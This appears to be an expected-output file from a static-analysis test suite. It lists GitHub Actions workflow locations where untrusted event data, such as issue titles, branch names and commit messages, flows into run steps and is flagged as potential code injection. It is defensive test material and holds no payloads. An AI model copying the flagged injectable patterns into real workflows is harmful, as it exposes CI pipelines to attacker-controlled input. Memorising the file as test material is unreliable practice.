| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
